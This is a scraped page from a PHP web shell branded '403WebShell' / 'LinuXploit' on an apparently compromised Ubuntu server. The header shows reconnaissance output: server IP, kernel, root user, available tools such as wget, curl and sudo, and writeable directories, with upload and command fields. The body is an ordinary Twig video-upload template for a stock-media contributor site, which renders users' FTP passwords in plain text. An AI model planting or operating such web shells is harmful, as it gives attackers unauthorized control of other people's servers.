WordPress

Briefly unavailable for scheduled maintenance.
Check back in a some hours.
403WebShell
403Webshell
Server IP : 38.242.244.58  /  Your IP : 216.73.216.240
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux vmi1486879.contaboserver.net 5.4.0-166-generic #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 x86_64
User : root ( 0)
PHP Version : 7.4.3-4ubuntu2.19
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/sura/templates/stock/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/sura/templates/stock/videos_upload.html.twig
{% extends 'contributor/layout.html.twig' %}

{% block title %}Videos Upload{% endblock %}
     {% block contributor_body %}
         <div class="app_main_inner">
             {% set new=false %}
             {% for message in app.flashes('contributor_success') %}
                 {% include "registration_progress.html.twig" with {"progress": 4} %}
                 {% set new=true %}
                 <div class="alert alert-success">
                     {{ message }}
                 </div>
             {% endfor %}
             <div class="page_excerpt">
                 <h2 class="sr_heading_title">Upload Videos</h2>
                 <p class="sr_heading_intro">
                     Turn your passion into a cash cow by submitting your best video footage. Make sure your video footage are of high quality with a maximum video length of 30 seconds and each file should not be larger than 2GB in size, all in MOV or MP4 format. The minimum video resolution required is HD 720p.
                 </p>
                 <div class="alert alert-danger" style="font-size:14px; margin-top:10px; padding: 10px;">
                     Please note, every file you upload will automatically be licensed as Royalty Free until our curator review and deem the file otherwise, but should you feel your work is worth being licensed as Rights Managed or Rights Ready kindly don’t hesitate to communicate to us.
                 </div>
             </div>

             <div class="new_upload">
                 <div class="upload_form">
                     <form action="{{ oneup_uploader_endpoint('stock') }}" class="dropzone" id="videosdropp">
                         <a href="{{ path('stock_videos') }}" data-new="{{ new }}" class="submit_next_btn">{{ button_label|default('Next') }}</a>

                     </form>

                 </div>
                 <div class="upload_options" style="margin-top: 6em;">
                     <div class="upload_cols">
                         <h4>Upload Using FTP (Optional)</h4>
                         <p>This method of file transfer File Transfer Protocol (FTP) allows Sura Images contributors to transfer files from their computer to our servers especially when transferring large files like video clips or many images that the contributor intends to upload all at once.</p>
                         <div class="ftp_procedure">
                             <ol>
                                 <li>Install FTP client software <a href="https://filezilla-project.org/download.php?show_all=1" target="_blank">(We recommend Filezilla)</a></li>
                                 <li>
                                     Configure your FTP connection to the following settings:
                                     <ul>
                                         <li>Host Address: <strong>{{ ftp_server }}</strong></li>
                                         <li>Username: <strong>{{ app.user.ftpUser.userid }}</strong></li>
                                         <li>Password: <strong>{{ app.user.ftpUser.passwd }}</strong></li>
                                     </ul>
                                 </li>
                                 <li>Connect and upload your photos</li>
                                 <li>Please Note that your videos should be uploaded to the photos directory</li>
                                 <li>After completion, the uploads will appear in your upload section</li>
                             </ol>
                         </div>
                     </div>

                     <div class="upload_cols">
                         <h4>Contributor General Guidelines</h4>
                         <p>Here are afew general guidelines to consider when creating your content that will meet our professional standards.
                             <br> <strong>Image Quality:</strong>  Always make sure your subject is perfectly exposed, well lit and in focus unless it's deliberately shot otherwise for instance when shooting to create motion blur or abstract content which are exceptional....</p>
                         <a href="{{ path('static_contributor_guidelines') }}" class="learn_more">Learn More</a>
                     </div>

                     <div class="upload_cols">
                         <h4>File Size Requirements</h4>
                         <p>The size of the video footage varys depending mostly on the length of the footage and the resolution of the footage (whether it's HD, 4K or SD).
                         To learn more about the size requirements see
                         <u><a href="{{ path('static_conterms') }}" target="_blank">Contributor Agreement </a> </u> page.</p>
                     </div>
                 </div>
             </div>

         </div>

         <div class="modal fade" id="ftp_detail">
             <div class="modal-dialog">
                 <div class="modal-content">
                     <h3 class="section_title">Upload your Videos using FTP.</h3>

                 </div>
             </div>
         </div>
     {% endblock %}
{% block stylesheets %}
    <script src="https://unpkg.com/multiple-select@1.3.1/dist/multiple-select.js"></script>
    <style>
        select {
            width: 500px;
        }
    </style>
{% endblock %}
{% block footer_js %}
    <script type='text/javascript' src='{{asset('js/upload.js')}}'></script>
{% endblock %}

Youez - 2016 - github.com/yon3zu
LinuXploit